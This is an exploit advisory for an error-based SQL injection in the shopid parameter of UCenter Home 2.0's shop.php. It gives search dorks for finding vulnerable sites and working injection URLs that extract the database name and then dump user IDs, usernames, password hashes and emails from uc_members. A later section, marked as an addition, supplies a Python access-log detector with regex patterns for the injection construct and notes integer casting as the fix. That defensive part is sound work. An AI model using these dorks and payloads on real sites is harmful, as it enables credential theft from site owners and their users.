__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL Error Based)
Needed materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
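
Detection side (added example, not part of the original advisory): a log check for requests to shop.php whose shopid is not a plain integer, with a stronger flag when the query carries the floor(rand(0)*2) / group by construct that the error-based technique above relies on. The access-log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Structural markers of the MySQL error-based technique named in the advisory:
# a duplicate-key error forced by GROUP BY over floor(rand(0)*2).
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "info_schema": re.compile(r"information_schema\s*\.\s*tables", re.I),
}
# Request part of a common/combined-format access-log line (assumed layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def inspect_request(line):
    """Return (shopid_is_integer, sorted marker names) for a shop.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("/shop.php"):
        return None
    shopid = parse_qs(parts.query, keep_blank_values=True).get("shopid", [""])[0]
    decoded = unquote_plus(parts.query)  # undo %20 and '+' before matching
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(decoded))
    return shopid.isascii() and shopid.isdigit(), hits

def flag_lines(lines):
    """Return [(line_number, reason)] for suspicious shop.php requests."""
    findings = []
    for no, line in enumerate(lines, 1):
        result = inspect_request(line)
        if result is None:
            continue
        is_integer, hits = result
        if "rand_floor" in hits and "group_by" in hits:
            findings.append((no, "error-based-sqli"))
        elif not is_integer:
            findings.append((no, "non-numeric-shopid"))
    return findings

# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2024:10:00:11 +0000] "GET /index.php?id=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, reason in flag_lines(SAMPLE_LOG):
        print(line_no, reason)
```

The same integer test is the mitigation on the application side: a shopid that is cast to an integer, or bound as a typed parameter, before it reaches the query cannot carry the construct flagged here.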